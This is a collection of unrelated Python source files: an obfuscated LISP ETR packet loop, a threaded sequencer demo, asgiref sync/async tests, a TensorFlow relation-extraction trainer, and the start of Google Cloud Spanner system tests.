if ( O0OOOOo0 == lisp . LISP_DATA_PORT ) :
oOoO ( oOo0oooo00o , oOO0 , i1OOO0000oO )
else :
if ( lisp . lisp_is_rloc_probe_request ( oOO0 [ 0 ] ) ) :
lisp . lprint ( "ETR ignoring RLOC-probe request, using pcap" )
continue
if 80 - 80: o0000oOoOoO0o
iioOO = lisp . lisp_parse_packet ( Oo0o0000o0o0 , oOO0 ,
i1OOO0000oO , O0OOOOo0 )
if 38 - 38: OoOO0ooOOoo0O . oooO0oo0oOOOO - ooOO00oOo . oo
if 65 - 65: o0oo0o
if 31 - 31: i11iIiiIii / oOo0O0Ooo % oOoO0oo0OOOo
if 44 - 44: II111iiii * oo + II11iiII
if 31 - 31: o0000oOoOoO0o * Ooo00oOo00o * o0000oOoOoO0o + ooOO00oOo * Ooo00oOo00o . o0oo0o
if ( iioOO ) :
oOOoo00O0O = threading . Timer ( 0 ,
iIIIiIi , [ None ] )
oOOoo00O0O . start ( )
o0oOoO00o = threading . Timer ( 0 ,
ooO0o0Oo , [ Oo0o0000o0o0 ] )
o0oOoO00o . start ( )
if 89 - 89: OoooooooOO * o0000oOoOoO0o * oo . Oo * o0000oOoOoO0o / i1I1ii1II1iII
if 46 - 46: i11iIiiIii
if 15 - 15: O0 / i1IIi / i1IIi . i1I1ii1II1iII % oOo0O0Ooo + oo
if 48 - 48: o0oo0o % i1I1ii1II1iII % o0000oOoOoO0o % iIii1I11I1II1 . o0000oOoOoO0o
if 14 - 14: i1I1ii1II1iII * ooOO00oOo % O0 + OoOO0ooOOoo0O + oOoO0oo0OOOo
if 23 - 23: OoO0O00 % i1I1ii1II1iII + o0000oOoOoO0o - o0oo0o
if 65 - 65: OoooooooOO
if 22 - 22: II11iiII + II111iiii + OoO0O00
if ( I11 in o0O0O0O00o ) :
i1i11ii1 , i1OOO0000oO , O0OOOOo0 , oOO0 = lisp . lisp_receive ( I11 , True )
if 83 - 83: Oo
if ( i1OOO0000oO == "" ) : break
if 43 - 43: II11iiII
if ( i1i11ii1 == "command" ) :
if ( oOO0 . find ( "learn%" ) != - 1 ) :
Oo00OOoO0oo ( oOO0 )
elif ( oOO0 . find ( "nonce%" ) != - 1 ) :
I1Ii1ii ( oOO0 )
elif ( oOO0 . find ( "clear%" ) != - 1 ) :
lispconfig . lisp_clear_decap_stats ( oOO0 )
elif ( oOO0 . find ( "rtr%" ) != - 1 ) :
iiiI1IiI ( oOO0 )
elif ( oOO0 . find ( "stats%" ) != - 1 ) :
oOO0 = oOO0 . split ( "%" ) [ - 1 ]
lisp . lisp_process_data_plane_decap_stats ( oOO0 , None )
else :
lispconfig . lisp_process_command ( I11 ,
i1i11ii1 , oOO0 , "lisp-etr" , [ OOo00o0oo0 ] )
if 84 - 84: II11iiII . oooO0oo0oOOOO . i1I1ii1II1iII
elif ( i1i11ii1 == "api" ) :
lisp . lisp_process_api ( "lisp-etr" , I11 , oOO0 )
else :
if ( lisp . lisp_is_rloc_probe_request ( oOO0 [ 0 ] ) ) :
lisp . lprint ( "ETR ignoring RLOC-probe request, using pcap" )
continue
if 2 - 2: OoO0O00 - oOo0O0Ooo
lisp . lisp_parse_packet ( Oo0o0000o0o0 , oOO0 , i1OOO0000oO , O0OOOOo0 )
if 49 - 49: o0000oOoOoO0o + II111iiii / iiiiIi11i - oOo0O0Ooo % oOo0O0Ooo + oo
if 54 - 54: Oo % OoO0O00 - II11iiII
if 16 - 16: oOoO0oo0OOOo * i1I1ii1II1iII / OoOO0ooOOoo0O
if 46 - 46: II111iiii
O0oO0 ( )
lisp . lisp_print_banner ( "ETR normal exit" )
exit ( 0 )
if 13 - 13: oooO0oo0oOOOO + II111iiii % oo
if 30 - 30: OoooooooOO - i11iIiiIii + iiiiIi11i / OoO0O00 - i11iIiiIii
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
main_thread.py
|
import os
import colorama
import multiprocessing
from dotenv import load_dotenv
from threading import Thread, current_thread
from model.sequencer import Sequencer
from utils.db_connection_db import DatabaseConnection
from utils.db_connection_mock import DatabaseConnectionMock
load_dotenv()
def show_id(seq: Sequencer):
current_process = multiprocessing.current_process()
thread_id = current_thread().ident
current_id = seq.get_id_safe()
print(colorama.Fore.YELLOW + f'Process Id: {current_process.pid} - '
f'Thread Id: {thread_id} - '
f'Sequencer Id: {current_id}', flush=True)
def main():
db_driver = os.environ["DB_DRIVER"]
db_name = os.environ["DB_NAME"]
db_user = os.environ["DB_USER"]
db_password = os.environ["DB_PASSWORD"]
db_host = os.environ["DB_HOST"]
db_port = os.environ["DB_PORT"]
db_conn = DatabaseConnection(db_driver, db_user, db_password, db_host, db_port, db_name)
#db_conn = DatabaseConnectionMock()
sequencer = Sequencer(db_conn)
jobs = []
print()
for _ in range(6):
jobs.append(Thread(target=show_id, args=(sequencer,), daemon=True))
[j.start() for j in jobs]
[j.join() for j in jobs]
print()
if __name__ == '__main__':
main()
|
test_sync.py
|
import asyncio
import threading
import time
from concurrent.futures import ThreadPoolExecutor
from functools import wraps
from unittest import TestCase
import pytest
from asgiref.sync import async_to_sync, sync_to_async
@pytest.mark.asyncio
async def test_sync_to_async():
"""
Tests we can call sync functions from an async thread
(even if the number of thread workers is less than the number of calls)
"""
# Define sync function
def sync_function():
time.sleep(1)
return 42
# Ensure outermost detection works
# Wrap it
async_function = sync_to_async(sync_function)
# Check it works right
start = time.monotonic()
result = await async_function()
end = time.monotonic()
assert result == 42
assert end - start >= 1
# Set workers to 1, call it twice and make sure that works right
loop = asyncio.get_event_loop()
old_executor = loop._default_executor
loop.set_default_executor(ThreadPoolExecutor(max_workers=1))
try:
start = time.monotonic()
await asyncio.wait([async_function(), async_function()])
end = time.monotonic()
# It should take at least 2 seconds as there's only one worker.
assert end - start >= 2
finally:
loop.set_default_executor(old_executor)
@pytest.mark.asyncio
async def test_sync_to_async_decorator():
"""
Tests sync_to_async as a decorator
"""
# Define sync function
@sync_to_async
def test_function():
time.sleep(1)
return 43
# Check it works right
result = await test_function()
assert result == 43
@pytest.mark.asyncio
async def test_nested_sync_to_async_retains_wrapped_function_attributes():
"""
Tests that attributes of functions wrapped by sync_to_async are retained
"""
def enclosing_decorator(attr_value):
@wraps(attr_value)
def wrapper(f):
f.attr_name = attr_value
return f
return wrapper
@enclosing_decorator("test_name_attribute")
@sync_to_async
def test_function():
pass
assert test_function.attr_name == "test_name_attribute"
assert test_function.__name__ == "test_function"
@pytest.mark.asyncio
async def test_sync_to_async_method_decorator():
"""
Tests sync_to_async as a method decorator
"""
# Define sync function
class TestClass:
@sync_to_async
def test_method(self):
time.sleep(1)
return 44
# Check it works right
instance = TestClass()
result = await instance.test_method()
assert result == 44
@pytest.mark.asyncio
async def test_sync_to_async_method_self_attribute():
"""
Tests sync_to_async on a method copies __self__
"""
# Define sync function
class TestClass:
def test_method(self):
time.sleep(0.1)
return 45
# Check it works right
instance = TestClass()
method = sync_to_async(instance.test_method)
result = await method()
assert result == 45
# Check __self__ has been copied
assert method.__self__ == instance
@pytest.mark.asyncio
async def test_async_to_sync_to_async():
"""
Tests we can call async functions from a sync thread created by async_to_sync
(even if the number of thread workers is less than the number of calls)
"""
result = {}
# Define async function
async def inner_async_function():
result["worked"] = True
result["thread"] = threading.current_thread()
return 65
# Define sync function
def sync_function():
return async_to_sync(inner_async_function)()
# Wrap it
async_function = sync_to_async(sync_function)
# Check it works right
number = await async_function()
assert number == 65
assert result["worked"]
# Make sure that it didn't needlessly make a new async loop
assert result["thread"] == threading.current_thread()
def test_async_to_sync():
"""
Tests we can call async_to_sync outside of an outer event loop.
"""
result = {}
# Define async function
async def inner_async_function():
await asyncio.sleep(0)
result["worked"] = True
return 84
# Run it
sync_function = async_to_sync(inner_async_function)
number = sync_function()
assert number == 84
assert result["worked"]
def test_async_to_sync_decorator():
"""
Tests we can call async_to_sync as a function decorator
"""
result = {}
# Define async function
@async_to_sync
async def test_function():
await asyncio.sleep(0)
result["worked"] = True
return 85
# Run it
number = test_function()
assert number == 85
assert result["worked"]
def test_async_to_sync_method_decorator():
"""
Tests we can call async_to_sync as a function decorator
"""
result = {}
# Define async function
class TestClass:
@async_to_sync
async def test_function(self):
await asyncio.sleep(0)
result["worked"] = True
return 86
# Run it
instance = TestClass()
number = instance.test_function()
assert number == 86
assert result["worked"]
@pytest.mark.asyncio
async def test_async_to_sync_in_async():
"""
Makes sure async_to_sync bails if you try to call it from an async loop
"""
# Define async function
async def inner_async_function():
return 84
# Run it
sync_function = async_to_sync(inner_async_function)
with pytest.raises(RuntimeError):
sync_function()
def test_async_to_sync_in_thread():
"""
Tests we can call async_to_sync inside a thread
"""
result = {}
# Define async function
@async_to_sync
async def test_function():
await asyncio.sleep(0)
result["worked"] = True
# Make a thread and run it
thread = threading.Thread(target=test_function)
thread.start()
thread.join()
assert result["worked"]
def test_thread_sensitive_outside_sync():
"""
Tests that thread_sensitive SyncToAsync where the outside is sync code runs
in the main thread.
"""
result = {}
# Middle async function
@async_to_sync
async def middle():
await inner()
# Inner sync function
def inner():
result["thread"] = threading.current_thread()
inner = sync_to_async(inner, thread_sensitive=True)
# Run it
middle()
assert result["thread"] == threading.current_thread()
@pytest.mark.asyncio
async def test_thread_sensitive_outside_async():
"""
Tests that thread_sensitive SyncToAsync where the outside is async code runs
in a single, separate thread.
"""
result_1 = {}
result_2 = {}
# Outer sync function
def outer(result):
middle(result)
outer = sync_to_async(outer, thread_sensitive=True)
# Middle async function
@async_to_sync
async def middle(result):
await inner(result)
# Inner sync function
def inner(result):
result["thread"] = threading.current_thread()
inner = sync_to_async(inner, thread_sensitive=True)
# Run it (in supposed parallel!)
await asyncio.wait([outer(result_1), inner(result_2)])
# They should not have run in the main thread, but in the same thread
assert result_1["thread"] != threading.current_thread()
assert result_1["thread"] == result_2["thread"]
def test_thread_sensitive_double_nested_sync():
"""
Tests that thread_sensitive SyncToAsync nests inside itself where the
outside is sync.
"""
result = {}
# Async level 1
@async_to_sync
async def level1():
await level2()
# Sync level 2
def level2():
level3()
level2 = sync_to_async(level2, thread_sensitive=True)
# Async level 3
@async_to_sync
async def level3():
await level4()
# Sync level 2
def level4():
result["thread"] = threading.current_thread()
level4 = sync_to_async(level4, thread_sensitive=True)
# Run it
level1()
assert result["thread"] == threading.current_thread()
@pytest.mark.asyncio
async def test_thread_sensitive_double_nested_async():
"""
Tests that thread_sensitive SyncToAsync nests inside itself where the
outside is async.
"""
result = {}
# Sync level 1
def level1():
level2()
level1 = sync_to_async(level1, thread_sensitive=True)
# Async level 2
@async_to_sync
async def level2():
await level3()
# Sync level 3
def level3():
level4()
level3 = sync_to_async(level3, thread_sensitive=True)
# Async level 4
@async_to_sync
async def level4():
result["thread"] = threading.current_thread()
# Run it
await level1()
assert result["thread"] == threading.current_thread()
class ASGITest(TestCase):
"""
Tests collection of async cases inside classes
"""
@async_to_sync
async def test_wrapped_case_is_collected(self):
self.assertTrue(True)
def test_sync_to_async_detected_as_coroutinefunction():
"""
Tests that SyncToAsync functions are detected as coroutines.
"""
def sync_func():
return
assert not asyncio.iscoroutinefunction(sync_to_async)
assert asyncio.iscoroutinefunction(sync_to_async(sync_func))
|
JointD+ATT.py
|
#coding:utf-8
import numpy as np
import tensorflow as tf
import os
import time
import datetime
import ctypes
import threading
import json
ll1 = ctypes.cdll.LoadLibrary
lib_cnn = ll1("./init_cnn.so")
ll2 = ctypes.cdll.LoadLibrary
lib_kg = ll2("./init_know.so")
class Config(object):
def __init__(self):
self.instanceTot = lib_cnn.getInstanceTot()
self.sequence_size = lib_cnn.getLenLimit()
self.num_classes = lib_cnn.getRelationTotal()
self.num_words = lib_cnn.getWordTotal()
self.num_positions = 2 * lib_cnn.getPositionLimit() + 1
self.word_size = lib_cnn.getWordDimension()
self.position_size = 5
self.embedding_size = self.word_size + self.position_size * 2
self.filter_size = 3
self.num_filters = 230
self.relation_size = self.word_size
self.dropout_keep_prob = 0.5
self.l2_lambda = 0.0001
self.NA = 51
lib_cnn.setNA(self.NA)
lib_cnn.setRate(3)
self.margin = 1.0
self.nbatches = 100
self.trainTimes = 15
self.entityTotal = 0
self.relationTotal = 0
class Model(object):
def calc(self, e, t, r):
return e + tf.reduce_sum(e * t, 1, keep_dims = True) * r
def __init__(self, config):
sequence_size = config.sequence_size
num_classes = config.num_classes
num_words = config.num_words
num_positions = config.num_positions
embedding_size = config.embedding_size
word_size = config.word_size
position_size = config.position_size
relation_size = config.relation_size
filter_size = config.filter_size
num_filters = config.num_filters
dropout_keep_prob = config.dropout_keep_prob
margin = config.margin
l2_lambda = config.l2_lambda
self.input_x = tf.placeholder(tf.int32, [None, sequence_size], name = "input_x")
self.input_p_h = tf.placeholder(tf.int32, [None, sequence_size], name = "input_p_h")
self.input_p_t = tf.placeholder(tf.int32, [None, sequence_size], name = "input_p_t")
self.input_r = tf.placeholder(tf.int32, [1, 1], name = "input_r")
self.input_r_n = tf.placeholder(tf.float32, [1, 1], name = "input_r_n")
self.input_h = tf.placeholder(tf.int32, [1, 1], name = "input_h")
self.input_t = tf.placeholder(tf.int32, [1, 1], name = "input_t")
self.input_y = tf.placeholder(tf.float32, [1, num_classes], name = "input_y")
self.pos_h = tf.placeholder(tf.int32, [None])
self.pos_t = tf.placeholder(tf.int32, [None])
self.pos_r = tf.placeholder(tf.int32, [None])
self.neg_h = tf.placeholder(tf.int32, [None])
self.neg_t = tf.placeholder(tf.int32, [None])
self.neg_r = tf.placeholder(tf.int32, [None])
l2_loss = tf.constant(0.0)
with tf.name_scope("embedding-lookup"):
self.word_embeddings = tf.Variable(word_embeddings, name="word_embeddings")
self.relation_embeddings = tf.get_variable("relation_embeddings", [config.relationTotal, word_size])
self.position_embeddings = tf.get_variable("position_embeddings", [num_positions, position_size])
self.relation_attention = tf.get_variable("relation_attention", [num_classes, relation_size])
self.NAattention = tf.get_variable("NAattention", [relation_size, 1])
self.attention = tf.get_variable("attention", [num_filters, relation_size])
self.ent_transfer = tf.get_variable("ent_transfer", shape = [len(word_embeddings), word_size])
self.rel_transfer = tf.get_variable("rel_transfer", shape = [config.relationTotal, word_size])
self.r = tf.nn.embedding_lookup(self.attention, self.input_r)
#know
pos_h_e = tf.nn.embedding_lookup(self.word_embeddings, self.pos_h)
pos_t_e = tf.nn.embedding_lookup(self.word_embeddings, self.pos_t)
pos_r_e = tf.nn.embedding_lookup(self.relation_embeddings, self.pos_r)
pos_h_t = tf.nn.embedding_lookup(self.ent_transfer, self.pos_h)
pos_t_t = tf.nn.embedding_lookup(self.ent_transfer, self.pos_t)
pos_r_t = tf.nn.embedding_lookup(self.rel_transfer, self.pos_r)
neg_h_e = tf.nn.embedding_lookup(self.word_embeddings, self.neg_h)
neg_t_e = tf.nn.embedding_lookup(self.word_embeddings, self.neg_t)
neg_r_e = tf.nn.embedding_lookup(self.relation_embeddings, self.neg_r)
neg_h_t = tf.nn.embedding_lookup(self.ent_transfer, self.neg_h)
neg_t_t = tf.nn.embedding_lookup(self.ent_transfer, self.neg_t)
neg_r_t = tf.nn.embedding_lookup(self.rel_transfer, self.neg_r)
pos_h_e = self.calc(pos_h_e, pos_h_t, pos_r_t)
pos_t_e = self.calc(pos_t_e, pos_t_t, pos_r_t)
neg_h_e = self.calc(neg_h_e, neg_h_t, neg_r_t)
neg_t_e = self.calc(neg_t_e, neg_t_t, neg_r_t)
#cnn
self.x_initial = tf.nn.embedding_lookup(self.word_embeddings, self.input_x)
self.x_p_h = tf.nn.embedding_lookup(self.position_embeddings, self.input_p_h)
self.x_p_t = tf.nn.embedding_lookup(self.position_embeddings, self.input_p_t)
self.x = tf.expand_dims(tf.concat(2, [self.x_initial, self.x_p_h, self.x_p_t]), -1)
self.head = tf.nn.embedding_lookup(self.word_embeddings, self.input_h)
self.tail = tf.nn.embedding_lookup(self.word_embeddings, self.input_t)
self.head_t = tf.nn.embedding_lookup(self.ent_transfer, self.input_h)
self.tail_t = tf.nn.embedding_lookup(self.ent_transfer, self.input_t)
self.r_t = tf.nn.embedding_lookup(self.rel_transfer, self.input_r)
self.head = self.calc(self.head, self.head_t, self.r_t)
self.tail = self.calc(self.tail, self.tail_t, self.r_t)
l2_loss += tf.nn.l2_loss(self.attention)
with tf.name_scope("conv-maxpool"):
self.W = tf.get_variable("W", [filter_size, embedding_size, 1, num_filters])
self.b = tf.get_variable("b", [num_filters])
conv = tf.nn.conv2d(self.x, self.W, strides=[1, 1, 1, 1], padding="VALID", name="conv")
h = tf.nn.tanh(tf.nn.bias_add(conv, self.b), name="tanh")
self.y = tf.nn.max_pool(h, ksize=[1, sequence_size - filter_size + 1, 1, 1], strides=[1, 1, 1, 1], padding='VALID', name="pool")
l2_loss += tf.nn.l2_loss(self.W)
l2_loss += tf.nn.l2_loss(self.b)
self.y = tf.reshape(self.y, [-1, num_filters])
with tf.name_scope('attention'):
self.r = tf.reshape(self.r, [relation_size, -1])
self.e = tf.matmul(tf.matmul(self.y, self.attention), self.r)
alpha = tf.reshape(self.e, [1, -1])
self.alpha_reshape = tf.nn.softmax(alpha)
self.y_attention = tf.matmul(self.alpha_reshape, self.y)
with tf.name_scope("dropout"):
self.y_attention = tf.nn.l2_normalize(self.y_attention, 1)
self.h_drop = tf.nn.dropout(self.y_attention, dropout_keep_prob)
self.transfer_w = tf.get_variable("transfer_w", [num_filters, num_classes])
self.scores = tf.matmul(self.h_drop, self.transfer_w)
l2_loss += tf.nn.l2_loss(self.transfer_w)
with tf.name_scope("loss"):
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(self.scores, self.input_y)
self.loss_cnn = tf.reduce_mean(cross_entropy) + l2_lambda * l2_loss
self.pos = tf.reduce_sum(abs(pos_h_e + pos_r_e - pos_t_e), 1, keep_dims = True)
self.neg = tf.reduce_sum(abs(neg_h_e + neg_r_e - neg_t_e), 1, keep_dims = True)
self.loss_kg = tf.reduce_sum(tf.maximum(self.pos - self.neg + margin, 0))
with tf.name_scope("accuracy"):
self.predictions = tf.argmax(self.scores, 1, name="predictions")
correct_predictions = tf.equal(self.predictions, tf.argmax(self.input_y, 1))
self.accuracy = tf.reduce_mean(tf.cast(correct_predictions, "float"), name="accuracy")
bags_sum = 0.0
bags_hit_NA = 0.0
sum_NA = 0.0
sum_fNA = 0.0
bags_hit = 0.0
loss_sum = 0.0
if __name__ == "__main__":
lib_cnn.readWordVec()
lib_cnn.readFromFile()
lib_kg.init()
np.random.seed(0)
tf.set_random_seed(0)
config = Config()
word_embeddings = np.zeros(config.num_words * config.word_size, dtype = np.float32)
lib_cnn.getWordVec.argtypes = [ctypes.c_void_p]
lib_cnn.getWordVec(word_embeddings.__array_interface__['data'][0])
word_embeddings.resize((config.num_words,config.word_size))
config.batch_size = lib_kg.getTripleTotal() / config.nbatches
config.entityTotal = lib_kg.getEntityTotal()
config.relationTotal = lib_kg.getRelationTotal()
with tf.Graph().as_default():
conf = tf.ConfigProto()
sess = tf.Session(config=conf)
with sess.as_default():
initializer = tf.contrib.layers.xavier_initializer()
with tf.variable_scope("model", reuse=None, initializer = initializer):
m = Model(config = config)
global_step_cnn = tf.Variable(0, name="global_step_cnn", trainable=False)
optimizer_cnn = tf.train.GradientDescentOptimizer(0.01)
grads_and_vars_cnn = optimizer_cnn.compute_gradients(m.loss_cnn)
train_op_cnn = optimizer_cnn.apply_gradients(grads_and_vars_cnn, global_step = global_step_cnn)
global_step_kg = tf.Variable(0, name="global_step_kg", trainable=False)
optimizer_kg = tf.train.GradientDescentOptimizer(0.001)
grads_and_vars_kg = optimizer_kg.compute_gradients(m.loss_kg)
train_op_kg = optimizer_kg.apply_gradients(grads_and_vars_kg, global_step=global_step_kg)
sess.run(tf.initialize_all_variables())
def outEmbedding(str1):
word_embeddings, relation_embeddings, position_embeddings, relation_attention, attention, W, B, transfer_w, transfer_b, softmax_w, softmax_b = sess.run([m.word_embeddings, m.relation_embeddings, m.position_embeddings, m.relation_attention, m.attention, m.W, m.b, m.transfer_w, m.transfer_b, m.softmax_w, m.softmax_b])
log = open("log"+str1+".txt", "w")
log.write(json.dumps(word_embeddings.tolist())+"\n")
log.write(json.dumps(relation_embeddings.tolist())+"\n")
log.write(json.dumps(position_embeddings.tolist())+"\n")
log.write(json.dumps(relation_attention.tolist())+"\n")
log.write(json.dumps(attention.tolist())+"\n")
log.write(json.dumps(W.tolist())+"\n")
log.write(json.dumps(B.tolist())+"\n")
log.write(json.dumps(transfer_w.tolist())+"\n")
NAattention = sess.run(m.NAattention)
log.write(json.dumps(NAattention.tolist()) + "\n")
ent_transfer = sess.run(m.ent_transfer)
log.write(json.dumps(ent_transfer.tolist()) + "\n")
rel_transfer = sess.run(m.rel_transfer)
log.write(json.dumps(rel_transfer.tolist()) + "\n")
log.close()
x_batch = np.zeros((config.instanceTot,config.sequence_size), dtype = np.int32)
p_t_batch = np.zeros((config.instanceTot,config.sequence_size), dtype = np.int32)
p_h_batch = np.zeros((config.instanceTot,config.sequence_size), dtype = np.int32)
r_batch = np.zeros((1, 1), dtype = np.int32)
y_batch = np.zeros((1, config.num_classes), dtype = np.int32)
r_n_batch = np.zeros((1, 1), dtype = np.float32)
h_batch = np.zeros((1, 1), dtype = np.int32)
t_batch = np.zeros((1, 1), dtype = np.int32)
x_batch_addr = x_batch.__array_interface__['data'][0]
p_t_batch_addr = p_t_batch.__array_interface__['data'][0]
p_h_batch_addr = p_h_batch.__array_interface__['data'][0]
y_batch_addr = y_batch.__array_interface__['data'][0]
r_batch_addr = r_batch.__array_interface__['data'][0]
r_n_batch_addr = r_n_batch.__array_interface__['data'][0]
h_batch_addr = h_batch.__array_interface__['data'][0]
t_batch_addr = t_batch.__array_interface__['data'][0]
lib_cnn.batch_iter.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p]
tipTotal = lib_cnn.getTipTotal()
loop = 0
def train_cnn(coord):
def train_step_cnn(x_batch, p_h_batch, p_t_batch, y_batch, r_batch, r_n_batch, h_batch, t_batch):
global bags_sum, bags_hit, loss_sum, bags_hit_NA, bags_hit, sum_fNA, sum_NA
feed_dict = {
m.input_x: x_batch,
m.input_p_h: p_h_batch,
m.input_p_t: p_t_batch,
m.input_r: r_batch,
m.input_r_n: r_n_batch,
m.input_y: y_batch,
m.input_h: h_batch,
m.input_t: t_batch
}
_, step, loss, accuracy = sess.run(
[train_op_cnn, global_step_cnn, m.loss_cnn, m.accuracy], feed_dict)
time_str = datetime.datetime.now().isoformat()
loss_sum += loss
bags_sum += 1
if (r_batch[0]!=config.NA):
sum_fNA += 1
if accuracy > 0.5:
bags_hit += 1.0
else:
sum_NA += 1
if accuracy > 0.5:
bags_hit_NA += 1.0
if bags_sum % 1000 == 0:
if (sum_NA == 0):
sum_NA+=1
if (sum_fNA == 0):
sum_fNA+=1
print("{}: step {}, loss {:g}, acc {:g} acc {:g} {} {}".format(time_str, step, loss_sum/bags_sum, bags_hit_NA/sum_NA, bags_hit/sum_fNA, sum_NA, sum_fNA))
global loop
while not coord.should_stop():
print 'Looping ', loop
outEmbedding(str(loop))
for i in range(tipTotal):
length = lib_cnn.batch_iter(x_batch_addr, p_h_batch_addr, p_t_batch_addr, y_batch_addr, r_batch_addr, r_n_batch_addr, h_batch_addr, t_batch_addr)
train_step_cnn(x_batch[0:length,], p_h_batch[0:length,], p_t_batch[0:length,], y_batch, r_batch, r_n_batch, h_batch, t_batch)
global bags_sum, bags_hit, loss_sum, bags_hit_NA, bags_hit, sum_fNA, sum_NA
bags_sum = 0
bags_hit = 0
bags_hit_NA = 0
loss_sum = 0
sum_fNA = 0
sum_NA = 0
loop += 1
if loop == config.trainTimes:
coord.request_stop()
ph = np.zeros(config.batch_size, dtype = np.int32)
pt = np.zeros(config.batch_size, dtype = np.int32)
pr = np.zeros(config.batch_size, dtype = np.int32)
nh = np.zeros(config.batch_size, dtype = np.int32)
nt = np.zeros(config.batch_size, dtype = np.int32)
nr = np.zeros(config.batch_size, dtype = np.int32)
ph_addr = ph.__array_interface__['data'][0]
pt_addr = pt.__array_interface__['data'][0]
pr_addr = pr.__array_interface__['data'][0]
nh_addr = nh.__array_interface__['data'][0]
nt_addr = nt.__array_interface__['data'][0]
nr_addr = nr.__array_interface__['data'][0]
lib_kg.getBatch.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int]
times_kg = 0
def train_kg(coord):
def train_step_kg(pos_h_batch, pos_t_batch, pos_r_batch, neg_h_batch, neg_t_batch, neg_r_batch):
feed_dict = {
m.pos_h: pos_h_batch,
m.pos_t: pos_t_batch,
m.pos_r: pos_r_batch,
m.neg_h: neg_h_batch,
m.neg_t: neg_t_batch,
m.neg_r: neg_r_batch
}
_, step, loss, = sess.run(
[train_op_kg, global_step_kg, m.loss_kg], feed_dict)
return loss
global times_kg
while not coord.should_stop():
times_kg += 1
res = 0.0
for batch in range(config.nbatches):
lib_kg.getBatch(ph_addr, pt_addr, pr_addr, nh_addr, nt_addr, nr_addr, config.batch_size)
res += train_step_kg(ph, pt, pr, nh, nt, nr)
coord = tf.train.Coordinator()
threads = []
threads.append(threading.Thread(target=train_kg, args=(coord,)))
threads.append(threading.Thread(target=train_cnn, args=(coord,)))
for t in threads: t.start()
coord.join(threads)
|
test_system.py
|
# Copyright 2016 Google LLC All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import datetime
import decimal
import math
import operator
import os
import struct
import threading
import time
import unittest
import uuid
import grpc
from google.rpc import code_pb2
from google.api_core import exceptions
from google.api_core.datetime_helpers import DatetimeWithNanoseconds
from google.cloud.spanner_v1 import param_types
from google.cloud.spanner_v1 import TypeCode
from google.cloud.spanner_v1 import Type
from google.cloud._helpers import UTC
from google.cloud.spanner_v1 import BurstyPool
from google.cloud.spanner_v1 import COMMIT_TIMESTAMP
from google.cloud.spanner_v1 import Client
from google.cloud.spanner_v1 import KeyRange
from google.cloud.spanner_v1 import KeySet
from google.cloud.spanner_v1.instance import Backup
from google.cloud.spanner_v1.instance import Instance
from test_utils.retry import RetryErrors
from test_utils.retry import RetryInstanceState
from test_utils.retry import RetryResult
from test_utils.system import unique_resource_id
from tests._fixtures import DDL_STATEMENTS
from tests._fixtures import EMULATOR_DDL_STATEMENTS
from tests._helpers import OpenTelemetryBase, HAS_OPENTELEMETRY_INSTALLED
CREATE_INSTANCE = os.getenv("GOOGLE_CLOUD_TESTS_CREATE_SPANNER_INSTANCE") is not None
USE_EMULATOR = os.getenv("SPANNER_EMULATOR_HOST") is not None
SKIP_BACKUP_TESTS = os.getenv("SKIP_BACKUP_TESTS") is not None
if CREATE_INSTANCE:
INSTANCE_ID = "google-cloud" + unique_resource_id("-")
else:
INSTANCE_ID = os.environ.get(
"GOOGLE_CLOUD_TESTS_SPANNER_INSTANCE", "google-cloud-python-systest"
)
EXISTING_INSTANCES = []
COUNTERS_TABLE = "counters"
COUNTERS_COLUMNS = ("name", "value")
BASE_ATTRIBUTES = {
"db.type": "spanner",
"db.url": "spanner.googleapis.com",
"net.host.name": "spanner.googleapis.com",
}
_STATUS_CODE_TO_GRPC_STATUS_CODE = {
member.value[0]: member for member in grpc.StatusCode
}
class Config(object):
"""Run-time configuration to be modified at set-up.
This is a mutable stand-in to allow test set-up to modify
global state.
"""
CLIENT = None
INSTANCE_CONFIG = None
INSTANCE = None
def _has_all_ddl(database):
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
return len(database.ddl_statements) == len(ddl_statements)
def _list_instances():
return list(Config.CLIENT.list_instances())
def setUpModule():
if USE_EMULATOR:
from google.auth.credentials import AnonymousCredentials
emulator_project = os.getenv("GCLOUD_PROJECT", "emulator-test-project")
Config.CLIENT = Client(
project=emulator_project, credentials=AnonymousCredentials()
)
else:
Config.CLIENT = Client()
retry = RetryErrors(exceptions.ServiceUnavailable)
configs = list(retry(Config.CLIENT.list_instance_configs)())
instances = retry(_list_instances)()
EXISTING_INSTANCES[:] = instances
# Delete test instances that are older than an hour.
cutoff = int(time.time()) - 1 * 60 * 60
instance_pbs = Config.CLIENT.list_instances("labels.python-spanner-systests:true")
for instance_pb in instance_pbs:
instance = Instance.from_pb(instance_pb, Config.CLIENT)
if "created" not in instance.labels:
continue
create_time = int(instance.labels["created"])
if create_time > cutoff:
continue
# Instance cannot be deleted while backups exist.
for backup_pb in instance.list_backups():
backup = Backup.from_pb(backup_pb, instance)
backup.delete()
instance.delete()
if CREATE_INSTANCE:
if not USE_EMULATOR:
# Defend against back-end returning configs for regions we aren't
# actually allowed to use.
configs = [config for config in configs if "-us-" in config.name]
if not configs:
raise ValueError("List instance configs failed in module set up.")
Config.INSTANCE_CONFIG = configs[0]
config_name = configs[0].name
create_time = str(int(time.time()))
labels = {"python-spanner-systests": "true", "created": create_time}
Config.INSTANCE = Config.CLIENT.instance(
INSTANCE_ID, config_name, labels=labels
)
created_op = Config.INSTANCE.create()
created_op.result(30) # block until completion
else:
Config.INSTANCE = Config.CLIENT.instance(INSTANCE_ID)
Config.INSTANCE.reload()
def tearDownModule():
if CREATE_INSTANCE:
Config.INSTANCE.delete()
class TestInstanceAdminAPI(unittest.TestCase):
def setUp(self):
self.instances_to_delete = []
def tearDown(self):
for instance in self.instances_to_delete:
instance.delete()
@unittest.skipIf(
